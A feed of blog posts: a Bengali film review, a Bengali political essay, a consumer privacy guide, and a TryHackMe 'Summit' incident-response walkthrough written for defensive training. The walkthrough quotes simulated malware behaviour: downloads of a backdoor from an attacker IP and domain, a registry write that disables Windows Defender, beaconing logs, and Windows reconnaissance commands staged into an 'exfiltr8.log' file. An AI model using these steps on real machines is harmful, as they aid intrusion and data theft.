সিনেমার আরেকটি গভীরভাবে নাড়া দেওয়া চরিত্র Kikuo Hasegawa। একসময়ের বিখ্যাত অভিনেতা, আজ স্মৃতিভ্রমে আক্রান্ত এক বৃদ্ধ। তার একটাই ইচ্ছা- শৈশবের বাড়ি, যৌবনের স্মৃতি, পরিবার নিয়ে কাটানো গ্রামের সেই নিবাসকে, সেই দিনগুলো আরেকবার দেখে আসা। কিন্তু বয়স আর রোগের দেয়ালে আটকে যায় সেই আকুতি।

নিজের মেয়ের নিষেধ অগ্রাহ্য করে Philip-কে সঙ্গী করে সে চুপিচুপি বেরিয়ে পড়ে। এই যাত্রা শুধু একটি ভ্রমণ নয়, বরং জীবনের শেষ প্রান্তে দাঁড়িয়ে নিজের অস্তিত্বটুকু ছুঁয়ে দেখার চেষ্টা।

আর Shinji Tada, এই চরিত্রটি যেন সবচেয়ে নগ্ন বাস্তবতার প্রতিচ্ছবি। মানসিক শান্তির জন্য সে ভাড়া করে নেয় স্ত্রী ও সন্তান। নিজের ভেতরের শূন্যতা ঢাকতে সে মিথ্যের আশ্রয় নেয়, কারণ তার কল্পনার পরিবার বাস্তবে নেই। তবু এই মিথ্যে সম্পর্কের মাঝেও তার বেঁচে থাকার লড়াইটা করুণভাবে সত্য। ⠀⠀⠀⠀ ⠀⠀⠀⠀ ⠀⠀⠀⠀ Rental Family কোনো উচ্চকণ্ঠ সিনেমা নয়। এখানে নেই নাটকীয় সংলাপ, নেই বড়ো কোনো মোড়। কিন্তু প্রতিটি দৃশ্য নিঃশব্দে প্রশ্ন ছুড়ে দেয়- আমরা কি সত্যিই একা? নাকি প্রয়োজন আর অভিনয়ের মাঝামাঝি কোথাও আমাদের অনুভূতিগুলো সত্যি হয়ে ওঠে?

সিনেমাটি শেষ হওয়ার পর মনে হয়েছে, এই গল্পটা শুধু পর্দার নয়- এটা আমাদের চারপাশেই ছড়িয়ে আছে। ভাড়ার সম্পর্ক, অভিনীত অনুভূতি, আর তার ভেতর জন্ম নেওয়া অপ্রত্যাশিত মানবিক বন্ধন- সব মিলিয়ে Rental Family এমন একটি সিনেমা, যা দেখে বেরিয়ে এসে মানুষ আর জীবনের দিকে নতুন করে তাকাতে ইচ্ছে করে।

⠀⠀

যদি আপনি নীরব, মানবিক আর ভাবনার খোরাক দেওয়া সিনেমা পছন্দ করেন, তাহলে এই সিনেমাটি আপনার দেখার তালিকায় থাকতেই পারে।

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from লোকমানুষ এর ব্লগ

শব্দ আছে, কণ্ঠ নেই..

এই ছবিটা আমাদের রাজনীতির নীরব আত্মকথা এখানে নেতা বলেন আর জনতা মুগ্ধ হয় শব্দগুলো আলো জ্বালায়, আকাঙ্ক্ষার মানচিত্র আঁকে মঞ্চে দাঁড়িয়ে পরিবর্তনের প্রতিশ্রুতিতে তালি পড়ে

কিন্তু মঞ্চ থেকে নামলেই দৃশ্য বদলে যায় স্বপ্ন পথে হাঁটতে চাইলে সিস্টেম চোখ রাঙানি দেয় প্রশ্ন করতে গেলেই হাত বাড়ে গলার দিকে কণ্ঠ রুদ্ধ হলে সত্য ও স্বপ্ন দু’টিই হাঁপিয়ে পড়ে

ক্ষমতার বড়ো মুখটা ছোট মুখটাকে অভিভূত করে, করতালির বিনিময়ে স্বপ্নের ছায়া দেখিয়ে বেড়ায় আশ্বাসের বাণী সব মাইক্রোফোনে উন্মুক্ত, আর মানুষ খুব সন্তর্পণে তার দীর্ঘশ্বাস লুকায়

আমাদের রাজনীতি শব্দ ভালোবাসে, কিন্তু কণ্ঠ সহ্য করতে পারে না এখানে বক্তৃতা নিরাপদ, বাস্তবতা বিপজ্জনক তবু ইতিহাস বলে- চেপে ধরা গলাও একদিন চিৎকার শিখে ফেলে...

ছবি কার্টেসি: Eiko Ojala

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Summit Incident Response TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

Can you chase a simulated adversary up the Pyramid of Pain until they finally back down?

The room is essentially a threat detection and response simulator focusing on defending against increasingly harder threats by following the levels on the Pyramid of Pain. We will be receiving .exe files by email, and will have to run those through a built-in sandbox analysis tool.

The first email we get is one containing a file named sample1.exe

Task 1: What is the first flag you receive after successfully detecting sample1.exe?

  1. Read the email and click on the attachment to download.
  2. Go to the burger menu on the top left, then click on the Malware Sandbox tool. Choose sample1.exe

After a while, we will get the results. We got an information table and a Behaviour Analysis section. For this task, though, we have to focus on the table:

File Name sample1.exe
File Size 202.50 KB
File Type PE32+ executable (GUI) x86-64, for MS Windows
Analysis Date September 5, 2023
OS Windows 10x64 v1803
Tags Trojan.Metasploit.A
MIME application/x-dosexec
MD5 cbda8ae000aa9cbe7c8b982bae006c2a
SHA1 83d2791ca93e58688598485aa62597c0ebbf7610
SHA256 9c550591a25c6228cb7d74d970d133d75c961ffed2ef7180144859cc09efca8c

Following the Pyramid of Pain, the first level is “Hash value.”

  1. Go to the burger menu, then click on Manage Hashes.
  2. There are three options: MD5, SHA1, SHA256. Pick either, and input the corresponding hash.

We will get a message congratulating us on completing the task, and a new email containing flag 1 and the next malware sample.

Task 2: What is the second flag you receive after successfully detecting sample2.exe?

  1. Read the new email and click on the sample2.exe attachment.
  2. Analyze the file on the Malware Sandbox tool.

But by changing just one bit the hash value of a file can change completely, so it is easy to evade this method. The second level of the Pyramid of Pain corresponds to IP Addresses. The analysis will give us, again, an information table, a Behaviour Analysis section, and now a Network Activity. The latter is the one we will have to check now.

The results are as follows (Information Table and Behaviour Analysis sections omitted):

Network Activity

HTTP(S) requests

1

TCP/UDP connections

3

DNS requests

0

Threats

0

HTTP requests

PID Process Method IP URL
1927 sample2.exe GET 154.35.10.113:4444 http://154.35.10.113:4444/uvLk8YI32

Connections

PID Process IP Domain ASN
1927 sample2.exe 154.35.10.113:4444 - Intrabuzz Hosting Limited
1927 sample2.exe 40.97.128.3:443 - Microsoft Corporation
1927 sample2.exe 40.97.128.4:443 - Microsoft Corporation

If we take a look at the HTTP Request we can see the executable connects to and downloads a file from the 154.35.10.113 IP address. We now have to create a Firewall rule for this IP address.

  1. Go to the Burger Menu, then click on the Firewall Manager tool. We need to fill some fields, which we will as follows:
  2. Type: Egress
  3. Source IP: Any
  4. Destination IP: 154.35.10.113
  5. Action: Deny

We will receive a congratulating message and a new email with flag 2.

Extra: Why not the other two IPs

According to the analysis, the file would make a connection to another two addresses: 40.97.128.3 and 40.97.128.4. These IP addresses, however, were identified to belong to Microsoft whereas the one we chose apparently belongs to a hosting service. Connecting to a Microsoft IP address is completely normal for business operations... not so much connecting to and downloading files from an IP address that belongs to a hosting service.

Task 3: What is the third flag you receive after successfully detecting sample3.exe?

Changing one's IP address is not particularly hard – the attacker mentions on their email message that they hired a new Cloud Service Provider and now have access to many more IPs. The third level of the Pyramid of Pain corresponds to Domain Names.

  1. Read the new email and analyze the sample3.exe file.

Under Network Activity we will have a new section, DNS requests.

(output omitted)

Network Activity

HTTP(S) requests

2

TCP/UDP connections

4

DNS requests

2

Threats

0

HTTP requests

PID Process Method IP URL
1021 sample3.exe GET 62.123.140.9:1337 http://emudyn.bresonicz.info:1337/kzn293la
1021 sample3.exe GET 62.123.140.9:80 http://emudyn.bresonicz.info/backdoor.exe

Connections

PID Process IP Domain ASN
1021 sample3.exe 40.97.128.4:443 services.microsoft.com Microsoft Corporation
1021 sample3.exe 62.123.140.9:1337 emudyn.bresonicz.info XplorIta Cloud Services
1021 sample3.exe 62.123.140.9:80 emudyn.bresonicz.info XplorIta Cloud Services
2712 backdoor.exe 62.123.140.9:80 emudyn.bresonicz.info XplorIta Cloud Services

DNS requests

Domain IP
services.microsoft.com 40.97.128.4
emudyn.bresonicz.info 62.123.140.9

The DNS requests section showed us the domain the executable is downloading files from, emudyn.bresonicz.info. The other one belongs to Microsoft, so we can assume it's safe.

  1. Head to the Burger menu, and then click on DNS Rule Manager.
  2. Click on Create DNS Rule
  3. We have to fill some fields. Do so as follows:
    • Rule name: (Any works. I named it “Deny Phishing Domain.”)
    • Category: Phishing
    • Domain Name: emudyn.bresonicz.info
    • Action: Deny

We will receive a congratulating message and a new email with flag 3.

Task 4: What is the fourth flag you receive after successfully detecting sample4.exe?

Changing one's domain is harder than changing an IP address, as this requires purchasing a new domain and modifying DNS records. Still, a very determined hacker might still be willing to do so (and also, some DNS providers have loose standards). The next level of the Pyramid of Pain corresponds to Host and Network Artifacts.

  1. Read the email and analyze sample4.exe.

The new email will contain a Registry Activity section after all the previous one. Let's take a look at that one.

(output omitted)

Registry Activity

Total events

3

Read events

1

Write events

2

Delete events

0

Modification events

(PID) Process: (3806) sample4.exe Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
Operation: write Name: DisableRealtimeMonitoring
Value: 1
(PID) Process: (1928) explorer.exe Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Operation: write Name: EnableBalloonTips
Value: 1
(PID) Process: (9876) notepad.exe Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts.txt
Operation: read Name: Progid
Value: txtfile

If we look at the first event, sample4.exe appears to be disabling Windows Defender Real-Time Protection by modifying the Windows Registry. This is the artifact, finding this is how we know we have a potentially infected host. We now have to create a rule that alerts us when this happens.

  1. Go to the Burger Menu, then click on Sigma Rule Builder.
  2. Click on Create Sigma Rule. A Sigma rule will be generated by an LLM based on the options we pick.
  3. On the “I want to create a rule that focuses on:” section, pick Sysmon Event Logs.
  4. On “I want to target this Sysmon event:”, pick Registry Modifications.
  5. You have to fill some fields to generate the rule. Fill them as follows:
    • Registry Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
    • Registry Name: DisableRealtimeMonitoring
    • Value: 1
    • ATT&CK ID: Defense Evasion (TA0005)
  6. Click on the Validate Rule button.

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 4.

Extra: why “alert” and not “respond”.

The reason we are creating a rule to alert rather than to respond like we did in the previous steps is because disabling Real Time Protection is, while unusual (and warned against on modern Windows), a potentially benign action. We alert the cybersecurity team when it occurs so they can investigate the situation and determine if it is expected or not, instead of just not allowing and potentially hindering a normal business operation.

Task 5: What is the fifth flag you receive after successfully detecting sample5.exe?

Knowing the artifacts an attacker leaves on a system means the attacker will have to change their tools and methodologies, which means they will have to spend even more resources to attack our system. We are now on the highest levels of the pyramid, the ones with the highest difficulty for the attacker to bypass, and at this point it's very likely they changed their target. Still, if the attacker persists, the second-to-last level of the Pyramid of Pain corresponds to detecting Tools.

  1. Read the new email and click on sample5.exe According to the email, the “heavy lifting” and instructions now occur on their backend server, which means we will have significantly less information on the file's actions.

This time we don't have the results of an analysis, but a log of attempted connections:

“ 2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes 2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80 | Size: 1204 bytes 2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes 2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:32:17 | Source: 10.10.15.12 | Destination: 72.15.61.98 | Port: 443 | Size: 26084 bytes 2023-08-15 14:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 14:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 14:55:33 | Source: 10.10.15.12 | Destination: 208.45.72.16 | Port: 443 | Size: 45091 bytes 2023-08-15 15:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 15:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 15:40:10 | Source: 10.10.15.12 | Destination: 101.55.20.79 | Port: 443 | Size: 95021 bytes 2023-08-15 16:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 16:18:55 | Source: 10.10.15.12 | Destination: 194.92.18.10 | Port: 80 | Size: 8004 bytes 2023-08-15 16:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 17:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 17:09:30 | Source: 10.10.15.12 | Destination: 77.23.66.214 | Port: 443 | Size: 9584 bytes 2023-08-15 17:27:42 | Source: 10.10.15.12 | Destination: 156.29.88.77 | Port: 443 | Size: 10293 bytes 2023-08-15 17:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 18:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 18:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 19:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 19:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 20:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 20:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 21:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes

I confess the first thing I noticed was that the length for a lot of the attempts: most of them were over 10 KB in length. Then I realized what the actual problem with this log was: most of them go to the same destination, with the exact same byte length.

The attacker is probably using a tool that fragments messages in 97 bytes. Let us create a Sigma rule to detect when this happens.

  1. Go to Create Sigma Rule, then click on Sysmon Event Logs.
  2. On “I want to target this Sysmon event:”, pick Network Connections.
  3. Fill the requested fields as follows:
    • Remote IP: Any
    • Remote Port: Any
    • Size (bytes): 97
    • Frequency (seconds): 1800
    • ATT&CK ID: Command and Control (TA0011)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 5.

Extra: why this rule

Like in the previous task, we need to alert rather than to block, as legitimate network traffic may match this criteria. We chose the Remote IP and Remote Port to be “Any” because we now the attacker can change their IP address, but this also causes that this rule could be triggered at any point. However, SOC analysts would notice how many messages with the same length would go to the same IP address, and the fact that it happens every 30 minutes without fail, and respond to it. This is a common Defense Evasion technique, as fragmented messages are stealthier than sending all the data meant to be exfiltrated at once, and would also stop Data Loss Prevention systems from being executed.

Task 6: What is the final flag you receive from Sphinx?

A top attacker might have enough money and time to invest in changing and/or building and learning new tools and methodologies. We are at the last level of the Pyramid of Pain, and this corresponds to the Tactics, Techniques, and Procedures of the attacker. If we can detect and respond to how an attacker operates, they have almost no chance to fight back.

  1. Read the final email and open the attachment.

This time the attachment is a log of the commands the sample files run once opened:

dir c:\ >> %temp%\exfiltr8.log
dir “c:\Documents and Settings” >> %temp%\exfiltr8.log
dir “c:\Program Files\” >> %temp%\exfiltr8.log
dir d:\ >> %temp%\exfiltr8.log
net localgroup administrator >> %temp%\exfiltr8.log
ver >> %temp%\exfiltr8.log
systeminfo >> %temp%\exfiltr8.log
ipconfig /all >> %temp%\exfiltr8.log
netstat -ano >> %temp%\exfiltr8.log
net start >> %temp%\exfiltr8.log
This is showing us the sample files were using commands that display important system information (directory trees, user list, system info, network information) and redirect the output to a file named exfiltr8.log, located in the temp folder (common place to hide malware, as nearly everything has writing permissions here.) Let us generate a rule to detect the creation of this file.

  1. Go to Create Sigma Rule, and then click on System Event Logs.
  2. On “I want to target this Sysmon event:”, pick File Creation and Modification.
  3. Fill the requested fields as follows:
    • File Path: %temp%
    • File Name: exfiltr8.log
    • ATT&CK ID: Collection (TA0009)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with the final flag.

Congratulations! The room is finished.

What I Learnt

  • Pyramid of Pain: this challenge allowed me to strengthen my knowledge on the framework, forcing me to think why each level has its corresponding difficulty, by thinking how an attacker could bypass a detection or deny rule.
  • Sigma rule structure: levels 3 to 5 involved generating a Sigma rule, which the SOC L1 learning path (this challenge was part of it) has no room on at this point.
  • Analyzing logs: task 5 was about to look for a specific pattern in a log file. Even if at first I focused on the wrong pattern, I managed to realize quite quickly what was I supposed to be looking for.
  • Learning how an attacker might hide their actions, and thinking of False Positives: some tasks involved the attacker hiding their signatures, or hiding their actions by modifying system files. For these I had to consider about False Positives as well, as some of their actions could be similar to normally benign actions, and creating an overly lax detection rule might make the SOC team focus on the wrong alert.
 
Read more...

from River

This guide will cover various recommendations for Windows/Linux/iOS with an eye for free, open-source, private software and privacy-enhancing tips. Given the amount I'll be covering, it will not be in maximum depth (i.e., I do not always offer all possible options or my full reasoning for recommendations). Please refer to my PC Privacy Guide, iOS Privacy Guide, and De-Googling Guide back on my old Substack for more focused guides.

And yes, non-corporate Linux and Graphene is vastly preferable to Windows and iOS. Your privacy on Windows and iOS is inherently compromised. You can, however, reduce data collection in some marginal ways, and you certainly can improve the external privacy of your system (i.e., reduce the amount that web trackers are monitoring you and such). Frankly, I do not yet have sufficient experience with either to really cover them in detail, nor do I think that installing a new OS is a privacy tip that most people will just up and follow. This article is aimed towards people who may not be willing to go that far yet. I do have some brief comments on OS options on.

I'll hopefully be putting out a follow-up post to this fairly soon, so stay posted for that. It'll be more FOSS and recommendations of cool tools rather than what I consider to be essential privacy steps.

Additional Resources

  • Privacy Tests – A website which compares open-source tests of browser privacy. It is one of the easiest ways to quickly compare the major browsers.

  • Avoid the Hack’s Browser Comparison Tool – Similar to Privacy Tests, but more generalized and with information on more browsers.

  • Privacy Guides and Avoid the Hack – Websites managed by people familiar with the privacy world, and so tend to have much better recommendations than similar sites. You can find recommended browsers, operating systems, email providers, etc.

  • EFF’s Cover Your Tracks – A tool that attempts to fingerprint your browser in order to determine how protected you are. Extremely helpful for testing whether features are truly improving your privacy.

  • O&O Software – Makers of a number of tools that can make Windows more secure/private. Many of the tools are paid, but AppBuster and ShutUp10++ are both free, and I highly recommend ShutUp10++ in particular for disabling Windows bloat/spyware.

De-Googling

While you may still need a Google account for certain things, you certainly can adjust settings to improve privacy and migrate most services away from Google.

For tweaks, most of the settings you'll want will be under Data & Privacy in Google Account. You'll ideally want to disable everything under Things you’ve done and places you’ve been. You'll also want to limit the amount of info shared under Info you can share with others and cut down on the number of third-party services under Data from apps and services you use.

Beyond the general tweaks, I'd highly recommend disabling all “personalization” and “smart” features, as nowadays that is often cover for AI-powered data harvesting. You can find a number of these features under general Gmail settings.

As for migration, Google's Dashboard, Takeout, and Delete Services will be your friends. Dashboard shows a general overview of your data and services, Takeout allows you to export your data, and Delete Services, of course, allows you to delete things.

Recommendations

  • Google Search –> Startpage, DuckDuckGo, or SearXNG. Startpage is a simple Google and Bing wrapper, so should work well for most users. DDG has been implementing AI features I'm really not a fan of, but it does have some very handy features, an onion service, and a version of the engine without AI, so DDG NoAI is my personal choice. SearXNG is the most versatile of the 3, even including search functions for torrents and other specifics, but service can be a bit spotty in my experience.

  • Gmail –> Tuta Mail or Mailbox Mail, and/or Thunderbird. Tuta and Mailbox Mail are both encrypted email providers that will be a significant step up from Gmail. That being said, bear in mind that the main gain is privacy in respect towards the provider – end-to-end encryption, by definition, is only ever enabled for these services if the person you are emailing uses a compatible encryption service. I've personally heard better things about Tuta's user experience, and it's what I personally use. If you continue to use Gmail, I'd recommend using Thunderbird as an email client, as it will provide some modest improvements over accessing your Gmail on the web (and does enable E2EE if you're looking to do so).

  • Google Maps –> Open Street Map/Organic Maps or Apple Maps. Open Street Map is community-developed, which is great, but means that it isn't always as up-to-date. Organic Maps is the one iOS app for OSM that I know of (though there may be others), and it doesn't have the best routing features, nor is it always up-to-date with OSM, even. For most people with iPhones, I'd recommend just using Apple Maps, as it is marginally more private than Google Maps, and much more comparable in features/map data.

  • Google Drive –> CryptPad or LibreOffice. Privacy Guides only recommends CryptPad, so it's my primary choice as well. Filen is a good second choice, especially if you need more than 1 free GB (Filen offers 10). LibreOffice is a decent primarily offline replacement, though as consequence it's more a Microsoft Office replacement than a Google one.

  • Google PhotosEnte. If you're wanting a specifically online photo/video manager, Ente is your best bet. Naturally, you could also simply store things offline or use one of the Drive replacements.

  • YouTube –> FreeTube. You have a lot of options for YouTube replacements, including alternative front-ends like Invidious and Fediverse equivalents like PeerTube. If you want to keep your subscriptions, however, a client is the way to go (Invidious had some support for accounts/subs, but I believe that's largely died). FreeTube is not the only client option, but it is easily my favorite. You can import your subcriptions quite easily, but for playlists you may have to import from URLs. Since Watch Later cannot be made public, to import it from URL you will have to copy it to another playlist, then import that playlist. The extension Multiselect for YouTube makes this fairly quick. FreeTube will occasionally break for a short time after YouTube changes things, but generally it works quite well, and has some fantastic features.

  • Google News –> NetWireNews (iOS) or Feeder (Android). I'd highly recommend using RSS for your news aggregation. It gives you much better control, and you can avoid ads and all other nonsense. You can typically add news sources simply by pasting in their URL, though occasionally you may need to add /rss or /feed to the end.

  • Google Keep –> Obsidian. It has so many great features; I truly can't recommend it enough.

  • Google Meet –> Jitsi Meet. Naturally, you may not always have a choice, but Jitsi is the preferred option for secure video calls.

Hardware

Avoid smart home devices at any cost, end of story. For a phone, ideally, I'd recommend a Pixel with GrapheneOS, the gold-standard for secure mobile OSs (Graphene has plans to be available on other phones, but this is still in the works). Privacy Guides also has some app recommendations and advice on how best to obtain apps (of particular note – avoid the Google Play store, and F-Droid isn’t the best either).

iOS Recommendations

Privacy and Security Settings

Shut off everything under Analytics and Improvements and Apple Advertising. Under Tracking, disable Allow Apps to Request to Track and disable permissions for all the apps that requested it.

Under Location Services, review which apps have access and disable or limit any unnecessary ones. This should include location logging for the Camera app! Next, at the bottom of Location Services you’ll want to go into System Services. You can disable the vast majority of these services. Emergency Calls and SOS, Find My iPhone, and Share My Location should probably be left enabled for most people. Disabling Networking and Wireless can potentially impact performance, since you may not always be connected to the closest tower. Personally, I haven’t noticed a difference. Everything under Product Improvement (iPhone Analytics, etc) should be disabled as well.

Still under System Services, I would also highly recommend disabling Significant Locations. This feature logs locations you visit in order to determine the titular “significant” locations, allowing it to effectively have map pins for your home, work, favorite grocery store, friends’ apartments, etc. This will clear certain Apple Maps saved locations, but I would recommend it regardless.

Lastly, I'd recommend going through Safety Check to see and confirm/retract information you are still sharing. Enabling the App Privacy Report can also be useful, as it logs what domains apps are contacting. (Note that it'll be on you to go back later and see what apps are regularly contacting Facebook; it's just a passive report).

iCloud

Obviously, anything in your iCloud can potentially be accessed by Apple. Thankfully, Apple does offer end-to-end encryption for iCloud, though it is disabled by default. Be aware that enabling it means that if you ever fully get locked out of your phone / iCloud, Apple will not be able to retrieve your stuff.

Under iCloud, disable anything you don’t need backed up (and consider that that could mean everything). You may also want to consider disabling Access iCloud Data on the Web at the bottom. Most crucially, enable Advanced Data Protection.

Network

Go to Wi-Fi, then select the i by your Wi-Fi network. Scroll down to Private Wi-Fi Address. Set this to Rotating if it isn’t already, and below it enable Limit IP Address Tracking. While your iPhone generally will, by default, generate a different address for each network, it may not be set to randomize on the same network. Rotating is generally better, but for networks that force you through a portal (like hotels), it may make you sign back in each time. (This is why, you’ll note, these settings are individual to each network).

I'd recommend setting up a private DNS, with Mullvad's “base” DNS being my top recommendation. This will help keep your browsing a little more private, with the added benefit of blocking ads, trackers, and malware. You can follow Mullvad's instructions on setting it up. It is fairly straightforward, but do be sure to do the seemingly pointless step of selecting the profile in Files (step 7), otherwise the Profile Download button will not appear in step 9.

A VPN isn't a bad idea either, though in my experience mobile VPNs can be a bit buggy at times. Proton VPN is the only good free option I know of (even though I don't wholly trust Proton), while Mullvad VPN would be my recommendation for anyone who can pay for a VPN. IVPN is pretty good as well, and fairly comparable to Mullvad. I would strongly recommend against any VPN that isn't those 3.

Browser

While there are an array of options for iOS browsers, the choices are in actuality limited by the restrictions that Apple places on browsers that are not Safari. Brave, DuckDuckGo, and Firefox Focus do all have some improvements over base Safari. So barring any tweaking, I'd recommend DDG as a daily driver and Firefox Focus if you want permanent incognito (I do not recommend Brave, both for the crypto BS and because the CEO is homophobic).

Overall, however, if you truly want a private browser, Safari is the best choice. I would recommend following Privacy Guide's tips for settings to harden it, excluding their recommendation to enable FaceID for private browsing (I don't recommend biometrics in general, since they potentially allow access without your consent).

I would also highly recommend installing uBlock Origin Lite as a Safari extension, which will help further reduce ads/trackers/etc. uBlock Origin is the gold-standard content blocker; I wouldn't recommend a different one.

Other Apps/Reccs

Use Signal whenever possible. Other messaging apps like WhatsApp or Telegram are marginally more secure than iMessage, but are significantly less secure than Signal.

Do not include locations on images, and ideally, go a step further and scrub the metadata entirely. You can create a button via Shortcuts to do this pretty easily. Note that you’ll need separate shortcuts for photos, videos, and GIFs. Making a GIF shortcut is very similar to the photos shortcut, but instead of using Convert, you use Make GIF. You could also just install an app to scrub metadata, but I'd recommend against it, as you don't know what is truly being done with your photos.

As mentioned, you can use Organic Maps for a totally private maps, though it isn't amazing. Again, Apple Maps is at least marginally better than Google Maps.

PC Privacy

Naturally, many of my De-Googling recommendations will be relevant here, so refer back to that if needed (for Office/Drive replacements, search engines, email, etc).

Operating Systems

I'm still a relative noob to Linux, but I have some potential distro recommendations. Linux Mint is the common recc for users new to Linux, as it is made to resemble Windows and is pretty well maintained. Privacy Guides recommends Fedora, openSUSE Tumbleweed, Arch Linux, and NixOS for privacy-conscious distributions. Of those, Fedora is the most beginner-friendly (which may not be saying too much if you have 0 command-line or Linux experience).

You'll also often have a choice of desktop environment, such as GNOME, KDE, Cinnamon, LXQt, and Xfce. Across both distros and desktop environments, you may see that some are considered “lightweight”, meaning that they are less resource intensive, and so may be good for older hardware.

I have only really used Lubuntu, a lightweight fork of Ubuntu using the LXQt desktop environment (I wouldn't recommend Ubuntu itself, as it's become pretty corporate). I put it on several old laptops and it's been pretty nice, though I think I'd probably use Fedora KDE if I wanted a true daily driver (greater privacy and support as far as I know, probably lower likelihood to run into some of the issues I've hit).

You can get most OSs “live”, meaning you can put them on a USB and boot from them without overwriting your true OS. Very handy for testing, and actually pretty easy! There are also some OSs that are purely live, such as Tails, which is an OS designed specifically for maximum privacy, routing connections through Tor and wiping data when done. You can also use Virtual Machines to run different OSs, including Whonix, which is similar to Tails, but with greater security features (and cannot, to my knowledge, run outside of a VM).

Windows Settings

Again, I’d highly recommend anyone who feels comfortable to jump to Linux to do so (and consider testing out a live OS, switching over may be easier than you think!). Otherwise, software like Revision can “clean” existing Windows 10/11. Please tread carefully if you’re interested; I can't attest much to functionality or trustworthiness. There are other options available for cleaner installs, but if you're willing to reinstall your OS, I would again highly encourage switching to Linux (compatibility has improved dramatically in recent years!).

Barring messing with your operating system directly, though, there are certainly still important steps you can take. To start, use ShutUp10++ to disable invasive Windows features – it will provide a GUI with recommendations and explanations for what should be disabled. Some following settings changes will be redundant with ShutUp10++.

Privacy and Security – In settings, go under Privacy & Security. Under General, turn off the Advertising ID in particular, along with the other settings in that section (except notifications). Disable everything under Diagnostics & Feedback and Text & Image Generation. Under Location, turn off Let Apps Access Your Location (they can still see approximate location; this just gets rid of precise location).

General Settings – Under Personalization > Device Use, disable everything. Also disable and remove anything under System > AI Components.

Wi-Fi – Go under Network & Internet > Wi-Fi. Below Hardware properties, enable Random hardware address. This can potentially force additional sign-ins on networks with portals, such as hotels, but is a good privacy step.

Services – Disable SSDP Discovery and UPnP Device Host. Both enable discovery and communication with different types of devices on your network, so this could potentially disconnect a device. This does not apply to standard Bluetooth devices, so for most people this is a security risk more than anything.

Browser

Your only options for a browser are Chromium-based and Gecko-based (i.e., Chrome/Firefox-based). Chromium has several limitations that immediately shoot any option there in the foot, so in all practicality you should only be looking at Firefox and Firefox forks.

Firefox itself isn't the worst, but has been making a move towards AI lately, and takes some effort to make more private. Refer to Privacy Guide's page on Firefox for more info if interested.

There are a number of forks that are probably ok options for daily drivers, such as Waterfox and Zen Browser. They benefit in not having the AI enshittification, but being downstream, are slower to update than Firefox (and therefore potentially vulnerable). So, if you're going with a fork, I'd recommend just going for one of the more privacy-focused options.

When it comes to truly private browsers, the forerunners are Librewolf, Mullvad, and Tor. Tor is the choice for the truly privacy conscious, as connections are routed over several relays, making it extremely difficult to match your browsing activity to you. Unfortunately, a number of websites block Tor users, and it can be a bit slower at times, so while I do recommend it for general browsing/searching, it probably won't be the best fit for daily use for most people.

